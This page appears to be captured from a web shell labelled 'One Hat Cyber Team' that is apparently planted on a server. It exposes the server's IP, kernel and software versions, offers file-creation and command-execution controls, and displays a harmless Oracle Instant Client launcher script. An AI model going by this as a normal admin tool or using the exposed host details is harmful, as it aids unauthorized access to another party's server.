⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
oci8-lib
/
instantclient_21_13
/
sdk
/
View File Name :
ott
#! /bin/sh # Script for running ott in instant client. # Before running this script: # set the default jdk<ver>/bin in your PATH # set LD_LIBRARY_PATH to include the directory containing the instant client # libraries # set ottclasses.zip, ojdbc<ver>.jar as part of your CLASSPATH OS=`uname` MACHINE=`uname -m` JREOPTIONS= if [ "$OS" = "HP-UX" ]; then if [ "$MACHINE" = "ia64" -o "$MACHINE" = "9000/800" ]; then JREOPTIONS=-d64 fi fi if [ "$OS" = "SunOS" ]; then if [ "$MACHINE" = "sun4u" -o "$MACHINE" = "sun4v" ]; then JREOPTIONS=-d64 fi fi while [ $# -gt 0 ] do case $1 in user*) OTTUSER="$OTTUSER $1" export OTTUSER ;; *) args="$args $1";; esac shift done exec java $JREOPTIONS oracle.ott.c.CMain nlslang=${NLS_LANG} $args